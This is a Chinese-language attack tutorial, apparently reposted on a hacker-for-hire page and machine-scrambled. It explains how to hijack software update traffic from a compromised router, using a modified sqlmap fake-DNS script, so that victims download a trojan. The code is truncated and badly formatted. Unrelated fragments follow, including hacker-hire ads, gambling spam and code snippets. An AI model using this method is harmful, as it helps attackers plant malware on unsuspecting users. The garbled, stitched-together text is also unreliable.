许多时分对方针进行浸透时一般会从web、 *** 设备、针对性垂钓这三个方向下手。假定咱们操控了方针 *** 中的一台 *** 设备,如路由器,内网用户流量会从这个当地通过咱们怎样获取其权限呢 ?
这种时分可以在路由器上抓包剖析用户流量,比方发动xshell、notepad++等软件时发送的更新恳求包,然后咱们替换软件更新的http呼应包到达植入木马意图。
剖析流量一般用tcpdump,假如只要路由器后台权限没有当地可以履行命令的话可以用DNS服务器合作HTTP署理来截获流量。
这儿就演示一下去绑架软件更新服务器到达植入木马的意图
一、布置DNS服务器
为了便利演示这儿将受害者机器上的DNS改为攻击者IP
下载sqlmap项目提取sqlmapsqlmap-stablelibrequest目录中的dns.py
履行看看作用
在用户机器上ping了一下,DNS服务器这边现已成功接纳域名解析恳求并呼应127.0.0.1
可是这个脚本中把一切域名解析恳求都呼应成127.0.0.1
需求修正一下
咱们的需求是可以正常解析域名,再对某些指定域名进行绑架。
修正后代码如下
#!/usr/bin/env python"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):
"""
Used for making fake DNS resolution responses based on received
raw request
Reference(s):
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
"""
def __init__(self, raw):
self._raw = raw
self._query = ""
type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits
if type_ == 0: # Standard query
i = 12
j = ord(raw[i]) while j != 0:
self._query += raw[i + 1:i + j + 1] + '.'
i = i + j + 1
j = ord(raw[i]) def response(self, resolution):
"""
Crafts raw DNS resolution response packet
"""
retVal = ""
if self._query:
retVal += self._raw[:2] # Transaction ID
retVal += "x85x80" # Flags (Standard query response, No error)
[1] [2] [3] [4] [5] 黑客接单网
咱们细心看看脚本,这个脚本设定好了电话的开场白、每一类型的回复对应的后续“分支剧情”以及间断节点,剧情完好,堪比境外欺诈集团的“剧本”。 在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了...
Windows Server 2008 x86再变换一下192.168.123.212观看赌博钱被没收钱还能要回来么?懂法的进, 服务端的config文件变为 response.setContentT...
Desc:它的作业原理是什么?尽管我没有在本文中提出任何新的概念,我将尽或许完整地展现从来没有看到任何人将这些办法放在一同的进犯,我结合了两种不同的进犯办法,即“跨协议脚本”和“DNS从头绑定”。 [...
public void WriteVbs(HttpContext context) { System.IO.File.WriteAllText(context....
「淘宝有黑客接单吗_怎样才能找到黑客的联系-黑客怎么找邮件」if (!url.contains("google.com")) {Linhai的出世年份现已搞定,回到秋潮视觉工作室主页,页面底部有lin...
SwapCache(int32 host_id) => (bool success);经过OlympicDestroyer的工作,咱们发现了一个与Sofacy和BlackEnergy相关的新式安...